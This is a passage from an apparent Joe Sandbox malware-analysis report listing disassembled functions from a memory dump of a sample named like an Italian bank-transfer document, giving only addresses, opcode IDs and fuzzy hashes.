                                  • Instruction Fuzzy Hash: 6E11C276A00715ABDB21DF59C9C1B9EFBB8EF88B50F500098DA41B7600DB35AD018B50
                                  Function 010EEA2E Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7dc710f6355497ef8b27769f794e3c9cbb6dc55b0c87cc3bc20e1a4401dab4a8
                                  • Instruction ID: 8745ff2d08958b83e2e73498417711a2de65b15aac0b2c0c8b6641b726b16de8
                                  • Opcode Fuzzy Hash: 7dc710f6355497ef8b27769f794e3c9cbb6dc55b0c87cc3bc20e1a4401dab4a8
                                  • Instruction Fuzzy Hash: 6101D27150010A9FC769DB19D488F5ABBFAEB85314F2882BEE1448B261C770AC82CB94
                                  Function 010EE53E Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                  • Instruction ID: 1f72032131f3849e25e2c8f23c5b2d01e33a2648e033754d4838839f90e3b3e6
                                  • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                  • Instruction Fuzzy Hash: 8C11E5722017D79FEB27972DD958B653BE4EB00744F1900E0EE818B682F328C853C655
                                  Function 0114E75D Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                  • Instruction ID: 1297b57d31c4e7ad3f3c25aa129ba7bde549b7a8fce0b4c0392bdc342191e81f
                                  • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                  • Instruction Fuzzy Hash: 6701D632602905EFE729DF58CC00F5A7AA9FB84F66F058024EA459B160E779DD41CBD0
                                  Function 010BA250 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                  • Instruction ID: 669b87d06ea0e589b905594a43e3b6851d594ee523141f8cf6123c2851ec232b
                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                  • Instruction Fuzzy Hash: 7701C471605B21DBDB618F1D9880AAA7BE5EB55770B00856DFDD58B681E731D400CBA0
                                  Function 0113E1D0 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3a7eaa01f3ef78be0954dd68075ae6b42e7501c978dc67a76643e13dffa9adab
                                  • Instruction ID: ff1e6322892ca4cdc9dd81c1eb72f49ec5566b2f4c23e0e0ba41cb7a173542a6
                                  • Opcode Fuzzy Hash: 3a7eaa01f3ef78be0954dd68075ae6b42e7501c978dc67a76643e13dffa9adab
                                  • Instruction Fuzzy Hash: F1118E31242345EFDB1AEF19C990F5A7BB8FF94B54F100065E9059B661C375ED01CA90
                                  Function 010C6259 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52294a5c863853a096d5b39639ae5597b937c6e24a004c6e165e5ea19fa4d307
                                  • Instruction ID: 02c8a91c989fcc2c094d05a2194ecccad30a52576adc7b641a0d54919db675df
                                  • Opcode Fuzzy Hash: 52294a5c863853a096d5b39639ae5597b937c6e24a004c6e165e5ea19fa4d307
                                  • Instruction Fuzzy Hash: B8119E7090162CABDB3AEB64CC42FEDB3B4AB08714F5041D4A314A61E0DB709E81CF84
                                  Function 010F6DA0 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                  • Instruction ID: 416024d90a3fcd1934a703f77c5edd8f725e72e754e64c8c5224c24cf74db568
                                  • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                  • Instruction Fuzzy Hash: 9401F1726042167BEB299E29C806B9F7FA8DB80B50F04405DAB869B680D7B5D890C3E0
                                  Function 01146050 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3074932ca92eb0ffcb173f87ce1eb6875638bce2379d48644efe997b98d4048a
                                  • Instruction ID: dd8c73ab89ef412d01e719ea103d641eb2925c8cf07f9f3432f21661fdd41d32
                                  • Opcode Fuzzy Hash: 3074932ca92eb0ffcb173f87ce1eb6875638bce2379d48644efe997b98d4048a
                                  • Instruction Fuzzy Hash: 8E111B72900119ABCB16DB94CC80DDFB77CEF48258F044166A906A7211EA34AA55CBE0
                                  Function 010C208A Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                  • Instruction ID: 0e4e961638743a2f9f7e7b283cb74974d8f4eb2e29024066a96d75bcf01eba6d
                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                  • Instruction Fuzzy Hash: 3101F5322002118BDF159B6DD880B9AB7A6BFC4B00F2541AAED858F24BDA718881DB90
                                  Function 01156500 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ba5e8b1679e6a57328916764d5acd4d021c0f0d6d526d319a97d7e2076380f5e
                                  • Instruction ID: d4ea5cac08267b82762fa0d16207a95522c618ac2b25ce6f0b5296bed0217020
                                  • Opcode Fuzzy Hash: ba5e8b1679e6a57328916764d5acd4d021c0f0d6d526d319a97d7e2076380f5e
                                  • Instruction Fuzzy Hash: CF11E132690146DFC349CF28D800BA6BBB9FB5A348F488159EC588B315D732EC81CBE0
                                  Function 0114C810 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4bf3bb54d5f81705f54b78088e9ed8d197e7510be98274dd772dea06c1e2125
                                  • Instruction ID: b42a4d3d3c8d506881383a78e96cf2dff52ab55f9c9ce3dcac2f118eb83f2469
                                  • Opcode Fuzzy Hash: a4bf3bb54d5f81705f54b78088e9ed8d197e7510be98274dd772dea06c1e2125
                                  • Instruction Fuzzy Hash: D611ECB1E012099FCB04DF99D581A9EB7F4FF58650F10406AA915E7351D774EA018BA4
                                  Function 010BC020 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                  • Instruction ID: 45f2c95d50d4aa948ced80ef2aa1444cd466a7b1dbb23bb95ecb1d50fb92bb89
                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                  • Instruction Fuzzy Hash: CF012D321007059FEF669669D544FE7B7F9FFD5214F044429A6958B540DB70E402CB51
                                  Function 011020F0 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f55f7149946fe03154be8ebc1965950dac539d1e7437cfeed3eb62893e563d3
                                  • Instruction ID: 9da290952866d91470579d44cb70e2c547ba50027f7e3f75afb897eb24193e73
                                  • Opcode Fuzzy Hash: 1f55f7149946fe03154be8ebc1965950dac539d1e7437cfeed3eb62893e563d3
                                  • Instruction Fuzzy Hash: EC116D75E0120DAFDB0AEF64D854FAE7BB5EF84644F004059EA019B290DB75AE11CB91
                                  Function 010FE5CF Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c7e1d823914e16f255c749f4e09211102cd0985e8dca45d6f81b1fb8d6880997
                                  • Instruction ID: f88de7988ebb10f37b4a91857b9c9f43844a825836ef589c9001b067ebebaf54
                                  • Opcode Fuzzy Hash: c7e1d823914e16f255c749f4e09211102cd0985e8dca45d6f81b1fb8d6880997
                                  • Instruction Fuzzy Hash: 4001F7B1200B097FC315BB79CD80E97B7ACFF946547000629B50583561DB34EC11C6E0
                                  Function 011569C0 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 07c4234d3f1c181a2c9f35712c09f4c3866cbb31b6cc61c5c998d18a89032a24
                                  • Instruction ID: f26b12f79df7add2566eb89dfa34bf60e90ae324a4c7e73531b8519555239dd2
                                  • Opcode Fuzzy Hash: 07c4234d3f1c181a2c9f35712c09f4c3866cbb31b6cc61c5c998d18a89032a24
                                  • Instruction Fuzzy Hash: 3F01FC32224712DFC368DF7AD8889A7BBA8FF54664F514229ED79871C0E7309901C7D2
                                  Function 0114C460 Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe1ba715b1368caebe970e01e487f0720d417dcc6fbb66935810c8ae8b3e23b9
                                  • Instruction ID: 636392d547b8f6ff80cc51bae7b14b6a5c923766c22a0daff392edd576631ec6
                                  • Opcode Fuzzy Hash: fe1ba715b1368caebe970e01e487f0720d417dcc6fbb66935810c8ae8b3e23b9
                                  • Instruction Fuzzy Hash: 3F115B75A01209ABDB19EFA8C940EAE7BB5FB48644F004059B90197390DB34EA11CB90
                                  Function 0114C97C Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1c18186ea5c3870f24f0ca28d7065726abf6a0b11614222bb47703b3854b152
                                  • Instruction ID: 60adca924372c47458fa70b7733e8da0f667724c4e6856bddcf067b5aade0d9a
                                  • Opcode Fuzzy Hash: b1c18186ea5c3870f24f0ca28d7065726abf6a0b11614222bb47703b3854b152
                                  • Instruction Fuzzy Hash: 3A1139B5A193099FC704DF69D441A9BBBE4FF98710F00851EBA98D7391E770E900CB96
                                  Function 0114CA11 Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a745a2def9fd17432e8bc9d07bd9b65e71845b6d80ab26ca8e5b44f7f3bf05a8
                                  • Instruction ID: 1eb2070de7d5a1daa99cbd3c1d83eb3478b036c9216efccb3e586678241bf642
                                  • Opcode Fuzzy Hash: a745a2def9fd17432e8bc9d07bd9b65e71845b6d80ab26ca8e5b44f7f3bf05a8
                                  • Instruction Fuzzy Hash: E91179B1A193089FC304DF69D441A4BBBE4FF99750F00851AB998D73A0E770E900CB96
                                  Function 01194A80 Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                  • Instruction ID: af70bf31075985ba792d2015b78a51501f9afb1f81fce82eebde949a037bf3c7
                                  • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                  • Instruction Fuzzy Hash: 6B014C362006069FDF29DA6DD944F93B7E6FFC1200F044459E6538BA90DB74F842C754
                                  Function 010DE016 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                  • Instruction ID: b0ce9d4f94b6bf8e4600e86581d6ae7f79a7103cbc722cffab8f83006dc939d4
                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                  • Instruction Fuzzy Hash: 8501DF322146849FE32A872DC908F2ABBD8EF44B44F0900B1FA45CF691D738DC80C621
                                  Function 010B826B Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c562cb31d2cf5c3bf596a28b199a905d6825c11d7f46cd885c2db836f6672eab
                                  • Instruction ID: e147111640723ebe869d9bbd52e507eb95b3b26d821e52d7b9b8682c99d44281
                                  • Opcode Fuzzy Hash: c562cb31d2cf5c3bf596a28b199a905d6825c11d7f46cd885c2db836f6672eab
                                  • Instruction Fuzzy Hash: 6401DF31A14505ABC71CEB6AD8809EEB7BDEF80620F05806ADA01A76A0DF30E902C690
                                  Function 010C2582 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d336715f02088652cef7401ab0fcc1fdeac12cf0d49b0890c7f05c7db0716ebb
                                  • Instruction ID: e501fca1e572d9522aa96c0a18f507211fd577ba1fa3743397d056be5ae5cfe6
                                  • Opcode Fuzzy Hash: d336715f02088652cef7401ab0fcc1fdeac12cf0d49b0890c7f05c7db0716ebb
                                  • Instruction Fuzzy Hash: 12F0F432B41B25B7C7359B5A8D40F5BBAA9EB94FA0F00402CA64597600CA30ED01CBB0
                                  Function 010EC073 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                  • Instruction ID: d5a2e68cdcc854230b445e33b760e7fb78a1ffbea9f44c2a8259354b6da02f75
                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                  • Instruction Fuzzy Hash: 2DF0C2B2A00615AFE328CF4EDD40E57FBEEDBD5A80F048168E549C7220EA31DD04CB90
                                  Function 010BC310 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                  • Instruction ID: be3259422875d80e9ad87eee374ad4ee48733744aac1ec37fb9e10b01afcd26f
                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                  • Instruction Fuzzy Hash: 0CF08B33206A339BF732165D49C0BEFAAD58FE1F64F1A4036F2899B304CA648D0293D0
                                  Function 010FCA6F Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                  • Instruction ID: 58f4666e7bb0a2d0d72d158696c72ce8e59cde76faf7d63e4f7ef9f3e32e4476
                                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                  • Instruction Fuzzy Hash: F1012832600689DBE336971DC906F9ABFD8EF81758F0941A9FB848FEA1D778D800C655
                                  Function 011961E5 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4bf4982da0e9c4cfa21f13d7fd1de102cce3aeba277196498e6d3f8cdbb32ef1
                                  • Instruction ID: fb1292d838e491e6efd2a1de5a4deb0c308a432e3cd64ea6667870edade1d7ae
                                  • Opcode Fuzzy Hash: 4bf4982da0e9c4cfa21f13d7fd1de102cce3aeba277196498e6d3f8cdbb32ef1
                                  • Instruction Fuzzy Hash: F6018F71E012499FCF08DFA9D441EEEBBF8BF58714F14405AE500AB280D774EA01CBA9
                                  Function 011463C0 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                  • Instruction ID: 33044441ad4d4b0b2c00794eb3f19ad6af76c79b35e331849e0266df2514a164
                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                  • Instruction Fuzzy Hash: 59F01D7220011DBFEF019F95DD80DEF7BBEEB596A8B104125FA1196160D731DD21EBA0
                                  Function 0114A4B0 Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 330eb9ad3af8190d00aa640127cfec9b254cfa789689b93362db6a4f7ca0c522
                                  • Instruction ID: f92b9561aa21be911a23688ba8c3c3c58dc4b44419a2a65608f0adb90ca8d7b2
                                  • Opcode Fuzzy Hash: 330eb9ad3af8190d00aa640127cfec9b254cfa789689b93362db6a4f7ca0c522
                                  • Instruction Fuzzy Hash: 5F018936100109ABCF169F84E940EDE3F66FF4C664F068111FE196A220C332D971EF81
                                  Function 010BC0F0 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 344fc9e0f40109c715e77e1b07b0710bba9e3afa910d370399a73248c04dbc55
                                  • Instruction ID: 749eab630fbee3b47bac0e70b42798d1682b3dca59270fa90401930cd9829cda
                                  • Opcode Fuzzy Hash: 344fc9e0f40109c715e77e1b07b0710bba9e3afa910d370399a73248c04dbc55
                                  • Instruction Fuzzy Hash: 2CF08B322002415BF7949208CD51BA232D5E7D1650F288469E7849F2C0E9B0CC018794
                                  Function 010F656A Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5894004b77460ceb52c65737aeba62ea9f5a621cc1d880b9d5bd042b897b4283
                                  • Instruction ID: 920b35945aca78a97dce75edcc261b7d29d0877f1190a98582c49fd440419d52
                                  • Opcode Fuzzy Hash: 5894004b77460ceb52c65737aeba62ea9f5a621cc1d880b9d5bd042b897b4283
                                  • Instruction Fuzzy Hash: EB01A470204B819BE36BA73CDD4DF6937E4BB40F04F480694BB41DBED6D769D4418615
                                  Function 0116437C Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction ID: 7e16f2fbc15599124a24385ea26509b9deada3c7c1abeb36d9a99cde8790acfa
                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction Fuzzy Hash: 9CF02E35349E3347EB3DAA2F8810B2FBA9E9F90E00B05052C9A41CBE80DF21DC10C780
                                  Function 0114E872 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
